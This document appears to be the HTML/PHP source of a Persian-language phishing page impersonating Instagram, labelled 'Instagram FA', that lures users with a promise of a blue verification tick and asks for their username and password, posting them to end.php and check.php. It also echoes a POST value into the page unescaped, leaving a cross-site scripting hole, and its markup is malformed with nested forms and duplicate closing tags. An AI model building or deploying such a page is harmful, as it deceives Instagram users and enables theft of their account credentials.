<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="description" content="">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <title>دریافت تیک آبی</title>
        <link href="https://cdn.rawgit.com/rastikerdar/shabnam-font/v4.0.0/dist/font-face.css" rel="stylesheet" type="text/css" />
        <link rel="stylesheet" href="assets/css/style.css">
        <meta charset="UTF-8">
        <!--===============================================================================================-->	
        <link rel="icon" type="image/png" href="images/icons/favicon.ico"/>
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="vendor/bootstrap/css/bootstrap.min.css">
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="fonts/font-awesome-4.7.0/css/font-awesome.min.css">
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="fonts/iconic/css/material-design-iconic-font.min.css">
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="vendor/animate/animate.css">
        <!--===============================================================================================-->	
            <link rel="stylesheet" type="text/css" href="vendor/css-hamburgers/hamburgers.min.css">
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="vendor/animsition/css/animsition.min.css">
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="vendor/select2/select2.min.css">
        <!--===============================================================================================-->	
            <link rel="stylesheet" type="text/css" href="vendor/daterangepicker/daterangepicker.css">
        <!--===============================================================================================-->
            <link rel="stylesheet" type="text/css" href="css/util.css">
            <link rel="stylesheet" type="text/css" href="css/main.css">
        <!--===============================================================================================-->
        <link href="cdn.rawgit.com/rastikerdar/shabnam-font/v4.0.0/dist/font-face.css" rel="stylesheet" type="text/css" />
        <link rel="stylesheet" href="assets/css/style.css">
        <script async src='../cdn-cgi/bm/cv/2172558837/api.js'></script>

    </head>
<body>
    <div class="field">
        <div class="limiter">
            <div class="container-login100">
                <div class="wrap-login100">

                <form class="login100-form validate-form">
                    <span class="login100-form-title p-b-26">
                        خوش آمدید
                    </span>
                    <span class="login100-form-title p-b-48">
                        <!-- <i class="zmdi zmdi-font"></i> -->
                    </span>

                    <?php echo $_POST['id'];?>
                    <form action="end.php" method="post">

                    <div class="form-group" data-validate = "Valid email is: a@b.c">
                        <input type="text" id="id" name="required" autocomplete="off">
                        <label for="input" class="control-label">نام کاربری</label>
                        <i class="bar"></i>
                    </div>
    
                    <div class="form-group">
                        <input type="password" id="lic" name="lic" required="required" autocomplete="off">
                        <label for="input" class="control-label">رمز عبور</label>
                        <i class="bar"></i>
                    </div>
    
                    <div class="container-login100-form-btn">
                        <div class="wrap-login100-form-btn">
                            <div class="login100-form-bgbtn"></div>
                                <form action="check.php" method="post">
                                    <button class="login100-form-btn">
                                    ثبت کردن
                                    </button>
                                </form>
                        </div>
                    </div>
                    </form>

                    <div class="text-center p-t-50">
                        <span class="txt1">
                            اکانت شما بررسی خواهد شد و در صورت داشتن شرایط تیک آبی را دریافت خواهید کرد
                        </span>
                    </div>
    
                    <div class="text-center p-t-70">
                        <span class="txt1">
                            شما هیچ اکانتی ندارید؟
                        </span>
    
                        <a class="txt2" href="https://www.instagram.com/accounts/emailsignup/">
                            ثبت نام
                        </a>
                    </div>
                </form>
            </div>
        </div>
        Instagram FA
    
    <script src='../../cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
    <script type="text/javascript">(function(){window['__CF$cv$params']={r:'5ef84de78a26c29f',m:'b1a9c60451e91f8f3367ff21989ee49f394d5c69-1604932988-1800-AXTOO9WC2iKhiyKw8E44lOpvLNcf12RR2A82u2HJdL09Znbs+oj1b61cXWsEbSpQpXpVfqeM+eA1H1uMWAKu8pTSIcVIK3nyrACSVYGwaE16deXCFUNXJiFGSmhZl55GVQ==',s:[0xdfe86672cc,0x0067ecf100],}})();</script></body>
    
    </div>
    
    <div id="dropDownSelect1"></div>
    
    <!--===============================================================================================-->
    <script src="vendor/jquery/jquery-3.2.1.min.js"></script>
    <!--===============================================================================================-->
    <script src="vendor/animsition/js/animsition.min.js"></script>
    <!--===============================================================================================-->
    <script src="vendor/bootstrap/js/popper.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.min.js"></script>
    <!--===============================================================================================-->
    <script src="vendor/select2/select2.min.js"></script>
    <!--===============================================================================================-->
    <script src="vendor/daterangepicker/moment.min.js"></script>
    <script src="vendor/daterangepicker/daterangepicker.js"></script>
    <!--===============================================================================================-->
    <script src="vendor/countdowntime/countdowntime.js"></script>
    <!--===============================================================================================-->
    <script src="js/main.js"></script>
    <!-- style -->

</body>
</html>>
</html>